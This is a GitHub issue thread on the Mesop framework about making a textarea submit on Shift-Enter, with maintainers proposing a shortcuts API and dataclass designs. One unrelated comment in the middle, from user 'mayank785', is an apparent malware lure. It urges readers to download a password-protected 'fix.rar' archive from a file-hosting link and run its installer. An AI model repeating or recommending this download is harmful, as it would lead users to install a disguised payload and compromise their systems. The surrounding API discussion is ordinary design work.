### ISSUE TITLE
Submit text box on Shift-Enter

### ISSUE THREAD

**Issue by simonff** [google/mesop#854]
It would be great to make the input box submit on Shift-Enter.

As said in chat: "You should be able to implement it with web component, but not super straightforward: https://google.github.io/mesop/web-components/"

**Comment by richard-to** [comment]
For an example web component, you can take a look at: https://github.com/google/mesop/tree/main/mesop/examples/web_component/hotkeys

Would need adjustments to make it work internally.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by wwwillchen** [comment]
Possible API to support this natively:

```py
me.native_textarea(
        placeholder="Type your message...",
        shortcuts={
            "Enter": None,  # Just does regular newline
            "Shift+Enter": action,
            "Ctrl+Enter": send,
            "Cmd+Enter": send
        },
        style=...
    )
```

```py
class me.ShortcutEvent:
  key: str # component key? 
  shortcut: str # shortcut pressed
```

Alternative, instead of string, we could have a Shortcut data class.

**Comment by richard-to** [comment]
I think the shortcut event would also need to include the text input. Otherwise we'd have to use on_input. I guess the drawback of that is that it would make the shortcut event less generic.

In terms of the API. How does the dict of shortcuts work? Does it route to a specific event handler function on the client side?

I guess the alternatives is to register the hot keys and then send them all to a single registered event handler. But in that case it'd be less generic, though slightly simpler.

On a side note, I think it could be useful if there was a way to retrieve say the text from the textarea from another component. That could open up other options for APIs I think.

**Comment by wwwillchen** [comment]
Recapping offline discussion with @richard-to:

**Proposed API**

_Applies to textarea and native_textarea_

```py
me.textarea(
  shortcuts={
    me.Shortcut(control=True, key="Enter"): send_handler,
    me.Shortcut(shift=True, key="Enter"): send_handler,
    me.Shortcut(shift=True, key="Enter"): another_action,
  }
)

@dataclass
class TextareaShortcutEvent:
  key: str # component key
  shortcut: Shortcut # shortcut pressed
  value: str # value of the textarea

@dataclass
class Shortcut:
  control: bool
  command: bool
  shift: bool
  key: str 
```

**Considerations:**

- This should be flexible enough for virtually all textarea use cases that we are aware of.
- Potentially could use this for other components (e.g. box, to close the dialog in Richard's web component example), however there's some questions on whether the shortcut would require the component to be focused or not (and not every component can be focusable like textarea). For now we will only support textarea and more advanced use cases can be addressed through web components, e.g. #846.
